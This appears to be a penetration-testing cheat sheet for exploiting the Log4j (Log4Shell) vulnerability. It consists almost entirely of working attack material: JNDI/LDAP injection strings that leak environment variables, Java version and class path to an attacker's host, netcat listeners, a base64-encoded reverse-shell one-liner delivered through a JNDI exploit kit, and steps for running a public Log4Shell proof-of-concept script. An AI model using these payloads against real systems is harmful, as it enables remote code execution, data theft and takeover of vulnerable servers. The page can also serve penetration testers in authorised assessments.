Log4j
Test payload
## ------------------| Run netcat lis
nc -lvnp 4545
## ------------------| Payload
${jndi:ldap://<HOSTIP>:4545/h4rithd}
${jndi:ldap://<HOSTIP>:4545/${java:os}}
${jndi:ldap://<HOSTIP>:4545/${env:ftp_user}}
${jndi:ldap://<HOSTIP>:4545/${java:version}}
${jndi:ldap://<HOSTIP>:4545/${sys:java.class.path}}
${jndi:ldap://<HOSTIP>:4545/${sys:java.class.path}....${java:version}....${java:os}}
## ------------------|
echo -e '0\x0c\x02\x01\x01a\x07\x0a\x01\x00\x04\x00\x04\00' | nc -nvv -l -p 389 | xxd
${jndi:ldap://<HOSTIP>/${java:os}}
${jndi:ldap://<HOSTIP>/${java:version}}
${jndi:ldap://<HOSTIP>/${sys:java.class.path}}
Exploit I
## ------------------| Step 0x01
wget https://github.com/pimps/JNDI-Exploit-Kit/raw/master/target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar
## ------------------| Step 0x02
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HOSTIP> 4545 >/tmp/f' | base64 -w 0
## ------------------| Step 0x03
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -L <HOSTIP>:1389
## ------------------| Step 0x04
nc -lvnp 4545
${jndi:ldap://<HOSTIP>:1389/serial/CommonsCollections5/exec_unix/<base64>}
Expolit II
## ------------------| Step 0x01
git clone https://github.com/kozmer/log4j-shell-poc && cd log4j-shell-poc
pip3 install -r requirements.txt
## ------------------| Step 0x02
## For this to work, the extracted java archive has to be named: jdk1.8.0_20, and be in the same directory
## Download java from this https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
tar -xvf jdk-*.tar
mv jdk1* jdk1.8.0_20
## If you'r target is windows, edit the poc.py for cmd.exe
## ------------------| Step 0x03
nc -lvnp 4545
python3 poc.py --webport 8000 --lport 4545 --userip <LIP>
Last updated